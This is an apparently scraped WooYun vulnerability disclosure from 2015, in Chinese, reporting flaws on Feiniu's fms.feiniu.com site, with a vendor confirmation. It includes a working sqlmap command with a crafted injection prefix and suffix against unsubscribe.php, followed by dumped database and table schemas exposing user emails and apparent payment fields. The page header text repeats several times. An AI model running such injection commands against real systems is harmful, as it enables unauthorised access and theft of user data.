飞牛网某业务站点漏洞打包（涉及邮件、支付等信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130577

漏洞标题：飞牛网某业务站点漏洞打包（涉及邮件、支付等信息）

漏洞作者：路人甲

提交时间：2015-07-31 10:32

修复时间：2015-09-14 15:12

公开时间：2015-09-14 15:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-31：细节已通知厂商并且等待厂商处理中
2015-07-31：厂商已经确认，细节仅向厂商公开
2015-08-10：细节向核心白帽子及相关领域专家公开
2015-08-20：细节向普通白帽子公开
2015-08-30：细节向实习白帽子公开
2015-09-14：细节向公众公开

简要描述：

经常去大润发购物看到飞牛网广告，发现是乌云厂商，友情测试一下。

详细说明：

问题1：无验证码，存在撞裤风险

http://fms.feiniu.com/login.php

问题2：泄漏物理路径

http://fms.feiniu.com/mail.php

问题3：未授权访问导致的sql注入（update注入）

http://fms.feiniu.com/unsubscribe.php

页面为邮件退订功能，ref和uid参数存在sql注入
下面两次请求可以验证注入存在

判断mysql版本号为5

丢到sqlmap

c:\Python27\sqlmap>sqlmap.py -u "http://fms.feiniu.com/unsubscribe.php" --data="
ref=&uid=&RadioGroup1=%E5%86%85%E5%AE%B9%E4%B8%8D%E5%90%B8%E5%BC%95%E6%88%91&txt
Reason=&submit=" -p ref --prefix "'%2b(if((1=1" --suffix "),1,(select 1 union se
lect 2)))%2b'" --dbs

数据库：

back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] edm
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

edm库的表居然有694张。。。

查了一下csu_list表的列名：

Table: csu_list
[16 columns]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| add_time      | datetime    |
| content_id    | int(5)      |
| end_time      | datetime    |
| id            | int(11)     |
| mail_u        | int(2)      |
| mailer        | varchar(64) |
| mailserver_id | int(11)     |
| mg_report     | int(2)      |
| report_status | int(2)      |
| sc_db         | bigint(13)  |
| sc_name       | varchar(64) |
| send_status   | int(2)      |
| start_time    | datetime    |
| status        | int(2)      |
| timing        | datetime    |
| title         | varchar(64) |
+---------------+-------------+

从列名可以看出来，这张表存储的是邮件信息。
查了一下1414a_10w表的列名：

Table: 1414a_10w
[9 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| local          | varchar(64)  |
| email          | varchar(250) |
| id             | int(10)      |
| mail_status    | int(2)       |
| mem_tag        | int(2)       |
| pay_time_end   | datetime     |
| pay_time_start | datetime     |
| reg_time       | datetime     |
| status         | int(2)       |
+----------------+--------------+

根据pay_time_start等列名推测涉及支付信息。
获取一下此表中email的数量：

此表有10w用户数量。

漏洞证明：

如上所述：泄漏用户信息，邮件内容，支付信息。

修复方案：

重点修复问题1和问题3

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-07-31 15:12

厂商回复：

感谢对飞牛安全的关注，我们及时通知相关人员进行修复！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130577

漏洞标题：飞牛网某业务站点漏洞打包（涉及邮件、支付等信息）

相关厂商：飞牛网

漏洞作者：路人甲

提交时间：2015-07-31 10:32

修复时间：2015-09-14 15:12

公开时间：2015-09-14 15:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130577

漏洞标题：飞牛网某业务站点漏洞打包（涉及邮件、支付等信息）

相关厂商：飞牛网

漏洞作者： 路人甲

提交时间：2015-07-31 10:32

修复时间：2015-09-14 15:12

公开时间：2015-09-14 15:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0130577"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云